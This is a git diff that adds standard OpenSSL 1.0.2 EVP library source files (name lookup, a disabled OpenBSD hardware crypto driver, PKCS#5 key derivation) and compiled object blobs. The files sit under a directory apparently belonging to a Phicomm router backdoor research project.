+                         OBJ_NAME_TYPE_MD_METH | OBJ_NAME_ALIAS, name);
+        if (r == 0)
+            return (0);
+        check_defer(md->pkey_type);
+        r = OBJ_NAME_add(OBJ_nid2ln(md->pkey_type),
+                         OBJ_NAME_TYPE_MD_METH | OBJ_NAME_ALIAS, name);
+    }
+    return (r);
+}
+
+const EVP_CIPHER *EVP_get_cipherbyname(const char *name)
+{
+    const EVP_CIPHER *cp;
+
+    cp = (const EVP_CIPHER *)OBJ_NAME_get(name, OBJ_NAME_TYPE_CIPHER_METH);
+    return (cp);
+}
+
+const EVP_MD *EVP_get_digestbyname(const char *name)
+{
+    const EVP_MD *cp;
+
+    cp = (const EVP_MD *)OBJ_NAME_get(name, OBJ_NAME_TYPE_MD_METH);
+    return (cp);
+}
+
+void EVP_cleanup(void)
+{
+    OBJ_NAME_cleanup(OBJ_NAME_TYPE_CIPHER_METH);
+    OBJ_NAME_cleanup(OBJ_NAME_TYPE_MD_METH);
+    /*
+     * The above calls will only clean out the contents of the name hash
+     * table, but not the hash table itself.  The following line does that
+     * part.  -- Richard Levitte
+     */
+    OBJ_NAME_cleanup(-1);
+
+    EVP_PBE_cleanup();
+    if (obj_cleanup_defer == 2) {
+        obj_cleanup_defer = 0;
+        OBJ_cleanup();
+    }
+    OBJ_sigid_free();
+}
+
+struct doall_cipher {
+    void *arg;
+    void (*fn) (const EVP_CIPHER *ciph,
+                const char *from, const char *to, void *arg);
+};
+
+static void do_all_cipher_fn(const OBJ_NAME *nm, void *arg)
+{
+    struct doall_cipher *dc = arg;
+    if (nm->alias)
+        dc->fn(NULL, nm->name, nm->data, dc->arg);
+    else
+        dc->fn((const EVP_CIPHER *)nm->data, nm->name, NULL, dc->arg);
+}
+
+void EVP_CIPHER_do_all(void (*fn) (const EVP_CIPHER *ciph,
+                                   const char *from, const char *to, void *x),
+                       void *arg)
+{
+    struct doall_cipher dc;
+    dc.fn = fn;
+    dc.arg = arg;
+    OBJ_NAME_do_all(OBJ_NAME_TYPE_CIPHER_METH, do_all_cipher_fn, &dc);
+}
+
+void EVP_CIPHER_do_all_sorted(void (*fn) (const EVP_CIPHER *ciph,
+                                          const char *from, const char *to,
+                                          void *x), void *arg)
+{
+    struct doall_cipher dc;
+    dc.fn = fn;
+    dc.arg = arg;
+    OBJ_NAME_do_all_sorted(OBJ_NAME_TYPE_CIPHER_METH, do_all_cipher_fn, &dc);
+}
+
+struct doall_md {
+    void *arg;
+    void (*fn) (const EVP_MD *ciph,
+                const char *from, const char *to, void *arg);
+};
+
+static void do_all_md_fn(const OBJ_NAME *nm, void *arg)
+{
+    struct doall_md *dc = arg;
+    if (nm->alias)
+        dc->fn(NULL, nm->name, nm->data, dc->arg);
+    else
+        dc->fn((const EVP_MD *)nm->data, nm->name, NULL, dc->arg);
+}
+
+void EVP_MD_do_all(void (*fn) (const EVP_MD *md,
+                               const char *from, const char *to, void *x),
+                   void *arg)
+{
+    struct doall_md dc;
+    dc.fn = fn;
+    dc.arg = arg;
+    OBJ_NAME_do_all(OBJ_NAME_TYPE_MD_METH, do_all_md_fn, &dc);
+}
+
+void EVP_MD_do_all_sorted(void (*fn) (const EVP_MD *md,
+                                      const char *from, const char *to,
+                                      void *x), void *arg)
+{
+    struct doall_md dc;
+    dc.fn = fn;
+    dc.arg = arg;
+    OBJ_NAME_do_all_sorted(OBJ_NAME_TYPE_MD_METH, do_all_md_fn, &dc);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/names.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/names.o
new file mode 100644
index 0000000000000000000000000000000000000000..dc47b9074407d8a702eeb0014134a99489de5c65
GIT binary patch
literal 4528
zcmb`JUu+ab9LMMWAZIDt)0kL5$;DKxQ8qome;}q?dhNCxZPOMaQeCfi+xFmkt#^A0
zh(L0ZcsYo^iHR}x!I-EqJQ$)6LL*J^fhaNYg_uBmFe<(nh#?j{f4|w8yI<#Sqa^&2
zy_xyU_xERZc5n7bEZ*by`Is~xdydsck}@`{)%u;h+sRh4W_GP*?cc>CL1vbFLS|Wu
zmwUrz`L&R<JYM=HTDiI``a`^QzH;R@WahDoGh~eRm2Uoud5rS2ZM+jN{d~p`z$~5T
z<74wqTXnM9kt$;hbiZMM=)5s@E;@e>OE5-9%+lg6?qA-*8?$uj3@#YteWe8vxe$!b
zU)?Jd^+K8dQu*~DRBLS6;%wy%v-^%Nsqr*u_?&EagJ=(A<3eMM*Z9I7s1Xa~E98ie
zu(0ZA_$)4;$2yA>yjT3b!drK+6)^J`TFx)S4jSjrS7VsPKiX4fIrwlp%$cR`w$|vp
zd1ACJWR?!Kg?R$A<iPO66A%4UaYLJBkfqFxu9LHjhct@|?Y!dKh<NeVorvgemRsXT
zcRb?Ae@A4!+qP|vwC@}*WSv6f8GWPPu|E1#fe)jHH+1M7n;vyB+~XizVYqNZdIxqg
z*ur^a0l3iaa~tM6ILv(e!@f1m%R}$L64B=YG53gQk##660^@GM#<1P4g^&CFM$-i?
zWUlDeLdFH|GbJ>0*!G~t&{~UuZY|<J+@!U3YvFz^6k7q%(866>2y?wJeB`T-?3BW=
z{sqB!9WgC@Pz&*O{UrD>wx-tM@6$r4zwW`CacjX;eOm+WD(iny8f1S~>Syqti$Ka`
zpt>7NCjxx;ma@BH=qGXH-mDf}j%AD90d^NQbrxXD>llIn3wiMBYh9hkJoiF91A_2p
z0QyhDh5Myi96%$!+k>Y(_$wa#4G;bnaIEtaXwl}}hP?|d^6g@4<g@k}@J4lhCG@)$
z{da;-3NGJ?OCE8qdhkULz7pa#s%Mo4ZwHR+`c%}zpJ|A_*+bv&!S{$bx0E=JhrTTI
zgLqbe$-M6gKBsV&O-$Q)J;_otRw9$JlIhtgJ7-N~C74d(Ahv7BN~BU^npwT^!7d|i
z4fgbm#73=AqbnY>*x*oXU}Pk2rL$>=4R-Zg*>q|{KFhlU#*P?9V96;vxz9@36Lzku
z$<z|0(vx=H;rS+QN8}qnfK}Gwz)V%)ItT@pnatRUY+<&hmH;P*x?)wq%=li}C-q1*
z)}K#LreXOx+ve%E^$nS^VavT!wfJIeS$QV`OG{4evnCShOudVhpUF9PO7)Z&>)X*S
z!!H?031ct1+sgl$Rzm+~#kC2-@g0)<Rl-{cFA|Q=wbUOc{2szj6HfDfO*qYak#L&#
zGT}7uFND*)e-TdOG>P{i2=g@WYQm|09pN;uPB_h*Bm92IA@9#25B{bHFA?5K;=C<5
zzK*NlS`_<uQsFlQpCfVbtdaFxCj3FduM@tO@ThqI@xDa}?;)J(i-gnoCkdze9|@=N
ze<z&kKY$w0upYW!U8H`>cM^`@67oJIJ^06juOa#f^wF>^Q5qj_;=eU6&v8@X17e&}
zxIEuJRJc6fzEHS4$G%m#JjbpmT%IR46fVz)uvo8LmpljXJVKLPo&!wJADDI$<Ip-e
zx1Ex`oSjMNj=kSudMe>0m_DA*Gd(#oJ#A-!WoH~)hi}^T{C`i3C$j~8Ha9bC=bQsf
z=Mn5F_zT7V?>k`;2!cydzo<Hap<Sb!31hKrK8HW}4B)fY2^Y0f_+bZTiVyQ9=%cUv
z62o^FZ5>?5<@Y->w2dloab5n$fn!Wn{(t?W;EVY?;G!n|AEOZZa{aR1Oc<5Eq!uJ5
zrJvOHLkGWFmD|i-7XA?_6s^2}5|2X%W2*i~h5yq^Le(G7zef9aquI?668^Y<=qvr@
x{x!;to?l{6FuDILppTd8kB>>iTP1{_EA=ZwhG$Gee>}v%<o}5~s_mZ~{|j|_DGLAq

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/openbsd_hw.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/openbsd_hw.c
new file mode 100644
index 0000000..75d12e2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/openbsd_hw.c
@@ -0,0 +1,431 @@
+/* Written by Ben Laurie, 2001 */
+/*
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/rsa.h>
+#include "evp_locl.h"
+
+/*
+ * This stuff should now all be supported through
+ * crypto/engine/hw_openbsd_dev_crypto.c unless I botched it up
+ */
+static void *dummy = &dummy;
+
+#if 0
+
+/* check flag after OpenSSL headers to ensure make depend works */
+# ifdef OPENSSL_OPENBSD_DEV_CRYPTO
+
+#  include <fcntl.h>
+#  include <stdio.h>
+#  include <errno.h>
+#  include <sys/ioctl.h>
+#  include <crypto/cryptodev.h>
+#  include <unistd.h>
+#  include <assert.h>
+
+/* longest key supported in hardware */
+#  define MAX_HW_KEY      24
+#  define MAX_HW_IV       8
+
+#  define MD5_DIGEST_LENGTH       16
+#  define MD5_CBLOCK              64
+
+static int fd;
+static int dev_failed;
+
+typedef struct session_op session_op;
+
+#  define CDATA(ctx) EVP_C_DATA(session_op,ctx)
+
+static void err(const char *str)
+{
+    fprintf(stderr, "%s: errno %d\n", str, errno);
+}
+
+static int dev_crypto_init(session_op *ses)
+{
+    if (dev_failed)
+        return 0;
+    if (!fd) {
+        int cryptodev_fd;
+
+        if ((cryptodev_fd = open("/dev/crypto", O_RDWR, 0)) < 0) {
+            err("/dev/crypto");
+            dev_failed = 1;
+            return 0;
+        }
+        if (ioctl(cryptodev_fd, CRIOGET, &fd) == -1) {
+            err("CRIOGET failed");
+            close(cryptodev_fd);
+            dev_failed = 1;
+            return 0;
+        }
+        close(cryptodev_fd);
+    }
+    assert(ses);
+    memset(ses, '\0', sizeof *ses);
+
+    return 1;
+}
+
+static int dev_crypto_cleanup(EVP_CIPHER_CTX *ctx)
+{
+    if (ioctl(fd, CIOCFSESSION, &CDATA(ctx)->ses) == -1)
+        err("CIOCFSESSION failed");
+
+    OPENSSL_free(CDATA(ctx)->key);
+
+    return 1;
+}
+
+static int dev_crypto_init_key(EVP_CIPHER_CTX *ctx, int cipher,
+                               const unsigned char *key, int klen)
+{
+    if (!dev_crypto_init(CDATA(ctx)))
+        return 0;
+
+    CDATA(ctx)->key = OPENSSL_malloc(MAX_HW_KEY);
+
+    assert(ctx->cipher->iv_len <= MAX_HW_IV);
+
+    memcpy(CDATA(ctx)->key, key, klen);
+
+    CDATA(ctx)->cipher = cipher;
+    CDATA(ctx)->keylen = klen;
+
+    if (ioctl(fd, CIOCGSESSION, CDATA(ctx)) == -1) {
+        err("CIOCGSESSION failed");
+        return 0;
+    }
+    return 1;
+}
+
+static int dev_crypto_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                             const unsigned char *in, unsigned int inl)
+{
+    struct crypt_op cryp;
+    unsigned char lb[MAX_HW_IV];
+
+    if (!inl)
+        return 1;
+
+    assert(CDATA(ctx));
+    assert(!dev_failed);
+
+    memset(&cryp, '\0', sizeof cryp);
+    cryp.ses = CDATA(ctx)->ses;
+    cryp.op = ctx->encrypt ? COP_ENCRYPT : COP_DECRYPT;
+    cryp.flags = 0;
+    cryp.len = inl;
+    assert((inl & (ctx->cipher->block_size - 1)) == 0);
+    cryp.src = (caddr_t) in;
+    cryp.dst = (caddr_t) out;
+    cryp.mac = 0;
+    if (ctx->cipher->iv_len)
+        cryp.iv = (caddr_t) ctx->iv;
+
+    if (!ctx->encrypt)
+        memcpy(lb, &in[cryp.len - ctx->cipher->iv_len], ctx->cipher->iv_len);
+
+    if (ioctl(fd, CIOCCRYPT, &cryp) == -1) {
+        if (errno == EINVAL) {  /* buffers are misaligned */
+            unsigned int cinl = 0;
+            char *cin = NULL;
+            char *cout = NULL;
+
+            /* NB: this can only make cinl != inl with stream ciphers */
+            cinl = (inl + 3) / 4 * 4;
+
+            if (((unsigned long)in & 3) || cinl != inl) {
+                cin = OPENSSL_malloc(cinl);
+                memcpy(cin, in, inl);
+                cryp.src = cin;
+            }
+
+            if (((unsigned long)out & 3) || cinl != inl) {
+                cout = OPENSSL_malloc(cinl);
+                cryp.dst = cout;
+            }
+
+            cryp.len = cinl;
+
+            if (ioctl(fd, CIOCCRYPT, &cryp) == -1) {
+                err("CIOCCRYPT(2) failed");
+                printf("src=%p dst=%p\n", cryp.src, cryp.dst);
+                abort();
+                return 0;
+            }
+
+            if (cout) {
+                memcpy(out, cout, inl);
+                OPENSSL_free(cout);
+            }
+            if (cin)
+                OPENSSL_free(cin);
+        } else {
+            err("CIOCCRYPT failed");
+            abort();
+            return 0;
+        }
+    }
+
+    if (ctx->encrypt)
+        memcpy(ctx->iv, &out[cryp.len - ctx->cipher->iv_len],
+               ctx->cipher->iv_len);
+    else
+        memcpy(ctx->iv, lb, ctx->cipher->iv_len);
+
+    return 1;
+}
+
+static int dev_crypto_des_ede3_init_key(EVP_CIPHER_CTX *ctx,
+                                        const unsigned char *key,
+                                        const unsigned char *iv, int enc)
+{
+    return dev_crypto_init_key(ctx, CRYPTO_3DES_CBC, key, 24);
+}
+
+#  define dev_crypto_des_ede3_cbc_cipher dev_crypto_cipher
+
+BLOCK_CIPHER_def_cbc(dev_crypto_des_ede3, session_op, NID_des_ede3, 8, 24, 8,
+                     0, dev_crypto_des_ede3_init_key,
+                     dev_crypto_cleanup,
+                     EVP_CIPHER_set_asn1_iv, EVP_CIPHER_get_asn1_iv, NULL)
+
+static int dev_crypto_rc4_init_key(EVP_CIPHER_CTX *ctx,
+                                   const unsigned char *key,
+                                   const unsigned char *iv, int enc)
+{
+    return dev_crypto_init_key(ctx, CRYPTO_ARC4, key, 16);
+}
+
+static const EVP_CIPHER r4_cipher = {
+    NID_rc4,
+    1, 16, 0,                   /* FIXME: key should be up to 256 bytes */
+    EVP_CIPH_VARIABLE_LENGTH,
+    dev_crypto_rc4_init_key,
+    dev_crypto_cipher,
+    dev_crypto_cleanup,
+    sizeof(session_op),
+    NULL,
+    NULL,
+    NULL
+};
+
+const EVP_CIPHER *EVP_dev_crypto_rc4(void)
+{
+    return &r4_cipher;
+}
+
+typedef struct {
+    session_op sess;
+    char *data;
+    int len;
+    unsigned char md[EVP_MAX_MD_SIZE];
+} MD_DATA;
+
+static int dev_crypto_init_digest(MD_DATA *md_data, int mac)
+{
+    if (!dev_crypto_init(&md_data->sess))
+        return 0;
+
+    md_data->len = 0;
+    md_data->data = NULL;
+
+    md_data->sess.mac = mac;
+
+    if (ioctl(fd, CIOCGSESSION, &md_data->sess) == -1) {
+        err("CIOCGSESSION failed");
+        return 0;
+    }
+    return 1;
+}
+
+static int dev_crypto_cleanup_digest(MD_DATA *md_data)
+{
+    if (ioctl(fd, CIOCFSESSION, &md_data->sess.ses) == -1) {
+        err("CIOCFSESSION failed");
+        return 0;
+    }
+
+    return 1;
+}
+
+/* FIXME: if device can do chained MACs, then don't accumulate */
+/* FIXME: move accumulation to the framework */
+static int dev_crypto_md5_init(EVP_MD_CTX *ctx)
+{
+    return dev_crypto_init_digest(ctx->md_data, CRYPTO_MD5);
+}
+
+static int do_digest(int ses, unsigned char *md, const void *data, int len)
+{
+    struct crypt_op cryp;
+    static unsigned char md5zero[16] = {
+        0xd4, 0x1d, 0x8c, 0xd9, 0x8f, 0x00, 0xb2, 0x04,
+        0xe9, 0x80, 0x09, 0x98, 0xec, 0xf8, 0x42, 0x7e
+    };
+
+    /* some cards can't do zero length */
+    if (!len) {
+        memcpy(md, md5zero, 16);
+        return 1;
+    }
+
+    memset(&cryp, '\0', sizeof cryp);
+    cryp.ses = ses;
+    cryp.op = COP_ENCRYPT;      /* required to do the MAC rather than check
+                                 * it */
+    cryp.len = len;
+    cryp.src = (caddr_t) data;
+    cryp.dst = (caddr_t) data;  // FIXME!!!
+    cryp.mac = (caddr_t) md;
+
+    if (ioctl(fd, CIOCCRYPT, &cryp) == -1) {
+        if (errno == EINVAL) {  /* buffer is misaligned */
+            char *dcopy;
+
+            dcopy = OPENSSL_malloc(len);
+            memcpy(dcopy, data, len);
+            cryp.src = dcopy;
+            cryp.dst = cryp.src; // FIXME!!!
+
+            if (ioctl(fd, CIOCCRYPT, &cryp) == -1) {
+                err("CIOCCRYPT(MAC2) failed");
+                abort();
+                return 0;
+            }
+            OPENSSL_free(dcopy);
+        } else {
+            err("CIOCCRYPT(MAC) failed");
+            abort();
+            return 0;
+        }
+    }
+    // printf("done\n");
+
+    return 1;
+}
+
+static int dev_crypto_md5_update(EVP_MD_CTX *ctx, const void *data,
+                                 unsigned long len)
+{
+    MD_DATA *md_data = ctx->md_data;
+
+    if (ctx->flags & EVP_MD_CTX_FLAG_ONESHOT)
+        return do_digest(md_data->sess.ses, md_data->md, data, len);
+
+    md_data->data = OPENSSL_realloc(md_data->data, md_data->len + len);
+    memcpy(md_data->data + md_data->len, data, len);
+    md_data->len += len;
+
+    return 1;
+}
+
+static int dev_crypto_md5_final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    int ret;
+    MD_DATA *md_data = ctx->md_data;
+
+    if (ctx->flags & EVP_MD_CTX_FLAG_ONESHOT) {
+        memcpy(md, md_data->md, MD5_DIGEST_LENGTH);
+        ret = 1;
+    } else {
+        ret = do_digest(md_data->sess.ses, md, md_data->data, md_data->len);
+        OPENSSL_free(md_data->data);
+        md_data->data = NULL;
+        md_data->len = 0;
+    }
+
+    return ret;
+}
+
+static int dev_crypto_md5_copy(EVP_MD_CTX *to, const EVP_MD_CTX *from)
+{
+    const MD_DATA *from_md = from->md_data;
+    MD_DATA *to_md = to->md_data;
+
+    // How do we copy sessions?
+    assert(from->digest->flags & EVP_MD_FLAG_ONESHOT);
+
+    to_md->data = OPENSSL_malloc(from_md->len);
+    memcpy(to_md->data, from_md->data, from_md->len);
+
+    return 1;
+}
+
+static int dev_crypto_md5_cleanup(EVP_MD_CTX *ctx)
+{
+    return dev_crypto_cleanup_digest(ctx->md_data);
+}
+
+static const EVP_MD md5_md = {
+    NID_md5,
+    NID_md5WithRSAEncryption,
+    MD5_DIGEST_LENGTH,
+    EVP_MD_FLAG_ONESHOT,        // XXX: set according to device info...
+    dev_crypto_md5_init,
+    dev_crypto_md5_update,
+    dev_crypto_md5_final,
+    dev_crypto_md5_copy,
+    dev_crypto_md5_cleanup,
+    EVP_PKEY_RSA_method,
+    MD5_CBLOCK,
+    sizeof(MD_DATA),
+};
+
+const EVP_MD *EVP_dev_crypto_md5(void)
+{
+    return &md5_md;
+}
+
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p5_crpt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p5_crpt.c
new file mode 100644
index 0000000..d06ab90
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p5_crpt.c
@@ -0,0 +1,149 @@
+/* p5_crpt.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/evp.h>
+
+/*
+ * Doesn't do anything now: Builtin PBE algorithms in static table.
+ */
+
+void PKCS5_PBE_add(void)
+{
+}
+
+int PKCS5_PBE_keyivgen(EVP_CIPHER_CTX *cctx, const char *pass, int passlen,
+                       ASN1_TYPE *param, const EVP_CIPHER *cipher,
+                       const EVP_MD *md, int en_de)
+{
+    EVP_MD_CTX ctx;
+    unsigned char md_tmp[EVP_MAX_MD_SIZE];
+    unsigned char key[EVP_MAX_KEY_LENGTH], iv[EVP_MAX_IV_LENGTH];
+    int i;
+    PBEPARAM *pbe;
+    int saltlen, iter;
+    unsigned char *salt;
+    const unsigned char *pbuf;
+    int mdsize;
+    int rv = 0;
+    EVP_MD_CTX_init(&ctx);
+
+    /* Extract useful info from parameter */
+    if (param == NULL || param->type != V_ASN1_SEQUENCE ||
+        param->value.sequence == NULL) {
+        EVPerr(EVP_F_PKCS5_PBE_KEYIVGEN, EVP_R_DECODE_ERROR);
+        return 0;
+    }
+
+    pbuf = param->value.sequence->data;
+    if (!(pbe = d2i_PBEPARAM(NULL, &pbuf, param->value.sequence->length))) {
+        EVPerr(EVP_F_PKCS5_PBE_KEYIVGEN, EVP_R_DECODE_ERROR);
+        return 0;
+    }
+
+    if (!pbe->iter)
+        iter = 1;
+    else
+        iter = ASN1_INTEGER_get(pbe->iter);
+    salt = pbe->salt->data;
+    saltlen = pbe->salt->length;
+
+    if (!pass)
+        passlen = 0;
+    else if (passlen == -1)
+        passlen = strlen(pass);
+
+    if (!EVP_DigestInit_ex(&ctx, md, NULL))
+        goto err;
+    if (!EVP_DigestUpdate(&ctx, pass, passlen))
+        goto err;
+    if (!EVP_DigestUpdate(&ctx, salt, saltlen))
+        goto err;
+    PBEPARAM_free(pbe);
+    if (!EVP_DigestFinal_ex(&ctx, md_tmp, NULL))
+        goto err;
+    mdsize = EVP_MD_size(md);
+    if (mdsize < 0)
+        return 0;
+    for (i = 1; i < iter; i++) {
+        if (!EVP_DigestInit_ex(&ctx, md, NULL))
+            goto err;
+        if (!EVP_DigestUpdate(&ctx, md_tmp, mdsize))
+            goto err;
+        if (!EVP_DigestFinal_ex(&ctx, md_tmp, NULL))
+            goto err;
+    }
+    OPENSSL_assert(EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp));
+    memcpy(key, md_tmp, EVP_CIPHER_key_length(cipher));
+    OPENSSL_assert(EVP_CIPHER_iv_length(cipher) <= 16);
+    memcpy(iv, md_tmp + (16 - EVP_CIPHER_iv_length(cipher)),
+           EVP_CIPHER_iv_length(cipher));
+    if (!EVP_CipherInit_ex(cctx, cipher, NULL, key, iv, en_de))
+        goto err;
+    OPENSSL_cleanse(md_tmp, EVP_MAX_MD_SIZE);
+    OPENSSL_cleanse(key, EVP_MAX_KEY_LENGTH);
+    OPENSSL_cleanse(iv, EVP_MAX_IV_LENGTH);
+    rv = 1;
+ err:
+    EVP_MD_CTX_cleanup(&ctx);
+    return rv;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p5_crpt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p5_crpt.o
new file mode 100644
index 0000000000000000000000000000000000000000..bee5f56e001a19b98962abe036276bf705f77639
GIT binary patch
literal 3984
zcmbuCTWl0n7=TZ^g)Rcym5WpnT$4q&Q8qh;Dv0P#+i7RxY+Ktd(g=>*-JxA+x9fJ6
zl&g}q;<zkgV${S3UU=|{5HE?rq%;;qLNr_+jfqbvK_S?LHfR|C|Lh$0bh?w6_$O!1
zIp2Rdx0(O!z9lIwl@%3)Nd<X<lzNO3;$2c|hiNlRJY*@Eu339`3LoMt5o1Q&7Bzkn
zV-e#=u{&y<i**@S<->o>g1u}U@Yl+P0e?U?ZYAY>)w%$sWB%Wv7AEmYqT_$+UUBpw
z@#Ypq@{(H~pUgcj36sKwGg(ki<lu33Av`3(qz>0tRYK@|hg&Y_exG2<Mz`N5C%jY{
zF}{NU`dK+Y;y&N(_u{hTaZ_JJwFVFv1H5H-9;T=G-GEj^!Ju~ZZ!@=29=%`+lZs*f
zbxNMOT<9@xR0=-}R}|w8tbm4q*|}jR*WZK4a^k9D+$(AHYjUF7ze3LIem6%iDaI`Y
zcA=jJz-Tu)?dOUy!<IHaS@Z5@2>cCBTS?4r+2Qvd4BN)n-&Tyfb7Itty<wWBEpW|P
z44^r6<BVebMn@i<4IhHzSP8Mo#1Y(>!d7fkB^W7%Fa4jD`ZG92;)m&zC4X<p-zevQ
zz`vaZGp1;3!i#o^i?F42-#6!v`a`fZ;Y!q)l@oWAiks6X<vhG3ig8;pu2B!zgRxKV
zndU?oJYnaGVTzp@E4oR;if3_~C}R65=Zo)FQr=K}+4KcP{o!-?LN*(-ukI9gh&#pC
zM0HBq)}b~<I%KI+-L36a2efpb-XBP$GW}Y%&iDLQUm%s%>xNVNw4q&r!KA7WX6i_$
zK}}>cdN4sa_tc&;-oi74v^F(8=L^Job7?*2+Z@~w46PTQ&C#xKs6G@7ZLBL|m>eNh
zP;kE%Kxu7@5qQrhk-4CttSDBbVqYhz81YuDUQ+Eo4tsz;k6JqPMUkO|Xp4|<ArNWt
zc;By-JhjJMlE+u5l01Q<3z|KlcNU7CO{3Kj&*@6n2bG>pfJ9HA(c^3M)HZs&jUKlZ
zq)dg|Uqx=4WmGU{)Xo>z{ngCXx#;TWGVHnNZj|HI^C7h_KVcVHG|zr9C2Yq^YTQpe
zg@zKME&AmEf6>OV>mrz==E@_`UB>ML8!2FM)~DwKYzvg)*wEnQWoVb<aR)x+zz;a^
zf&)L{z)w5y2?u`Jf&b#bryck`2fp0;20%SW);aJ72QE8s?xPPXO(6mg0U!0G<E5sq
z2DPJ6Qsc=a*MoeL+S8|{iQ1~PH;Rhd-qO+~b*tTCqavv^bwr!hrta-(DxK1a)Y++K
za=NNzvqM>utWROc4zW{=60xgIP$O;KQY)mXJ`HRkYc;3(v|&90uBtY|kys`f*EPbN
